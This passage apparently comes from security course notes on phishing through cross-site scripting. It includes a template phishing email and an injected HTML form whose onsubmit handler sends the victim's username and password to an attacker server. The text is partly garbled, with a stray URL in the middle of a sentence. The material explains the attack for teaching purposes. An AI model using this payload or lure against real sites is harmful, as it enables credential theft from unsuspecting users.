Phishing
- Phishing uses XSS technique to steal victims credentials and
subsequently commit crimes using the stolen credentials.
- Attack Vectors:
- Staged site:
- Use social engineering (e.g., email, messageboard, etc.) to
trick a victim to click on a link to a staged site that has a HTML form
crafted to resemble the original form.
- The crafted url is usually camouflaged by encoding the
malicious portion
of the injected code or shortening the entire url.
- Here is an example of the email sent to the victim:
Dear Victim User, Due to an emergency server
shut
down, we have been experiencing some user account issues. As a result
it is necessary that you login to your account within the next 24 hours
to validate user membership or else you risk having your membership
being terminated. Please proceed by following the link, the hackers
version of login page, and log into your account. Thank you and we
apologize for the inconvenience
- After the victim sends the credential, the attackers fool the
victims by returning the
following message to the victim:
Dear Victim User, the system is in maintenance,
please try it later. Thank you and we
apologize for the inconvenience.
- Search a victim site and examine its login page.
- Create the injected code and
a fake login
page that looks similar, if not identical, to the victim site's. For
example:
</form>
<form action="login.aspx" method="post" onsubmit="XSSimage = new
Image; XSSimage.src=attackerserver + document.forms(1).login.value +
:+document.forms(1).password.value;">
- The </form> tag is providing a closing
tag
for the original form and therefore allowing the attacker to add and
manipulate his own. The onsubmit property is a
set
of https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_
%28OWASP-DV-003%29#Gray_Box_testing_and_exampleavascript instructions
that is executed when the user clicks
the submit button, just before the actual form request is sent. So a
new image called XSS is created when the user clicks the login
button to submit the form and a request will silently be sent to
attackers server that contains the login username and password of the
victim.